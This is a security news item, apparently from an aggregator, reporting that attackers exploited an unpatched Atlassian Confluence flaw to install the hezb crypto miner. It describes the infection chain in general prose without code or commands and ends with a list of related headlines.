Security News > 2022 > September > Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners
A now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.
In one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script on the victim's machine, which, in turn, fetched a second shell script.
The malicious code is designed to update the PATH variable to include additional paths such as "/tmp", download the cURL utility from a remote server, disable iptables firewall, abuse the PwnKit flaw to gain root privileges, and ultimately deploy the hezb crypto miner.
Like other cryptojacking attacks, the shell script also terminates other competing coin miners, disables cloud service provider agents from Alibaba and Tencent, before carrying out lateral movement via SSH. The findings mirror similar exploitation attempts previously disclosed by Lacework, Microsoft, Sophos, and Akamai in June.
Lacework's analysis further shows that the command-and-control server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named "Kik" that enables the malware to kill processes of interest.
"Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself," Bharti said.
News URL
https://thehackernews.com/2022/09/hackers-targeting-unpatched-atlassian.html
Related news
- North Korean hackers employ new tactics to compromise crypto-related businesses (source)
- North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS (source)
- North Korean hackers use new macOS malware against crypto firms (source)
- Hackers exploit ProjectSend flaw to backdoor exposed servers (source)
- XML-RPC npm Library Turns Malicious, Steals Data, Deploys Crypto Miner (source)
- Russian hackers hijack Pakistani hackers' servers for their own attacks (source)
- Russian hackers hijack Pakistani hackers' servers for their own attacks (source)
- Russia-Linked Turla Exploits Pakistani Hackers' Servers to Target Afghan and Indian Entities (source)
- Radiant links $50 million crypto heist to North Korean hackers (source)
- APT29 Hackers Target High-Value Victims Using Rogue RDP Servers and PyRDP (source)